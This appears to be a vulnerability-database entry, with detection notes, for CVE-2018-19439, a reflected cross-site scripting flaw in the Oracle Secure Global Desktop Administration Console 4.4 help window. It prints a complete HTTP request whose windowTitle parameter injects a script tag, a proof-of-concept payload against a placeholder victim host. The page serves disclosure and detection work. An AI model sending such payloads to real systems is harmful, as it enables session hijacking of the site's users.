🔙 목록으로 돌아가기

CVE-2018-19439: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting

TitleOracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
Authormadrobot,dwisiswant0
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions.
RemediationFixed in later versions including 5.4.
CVSS Score6.1
EPSS Score0.38875
CVE IDCVE-2018-19439
CWE IDCWE-79
Tags cve cve2018 oracle xss seclists packetstorm vuln

🔍 Vulnerability Description

Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.

🌐 HTTP Request

GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19439.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-19439.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A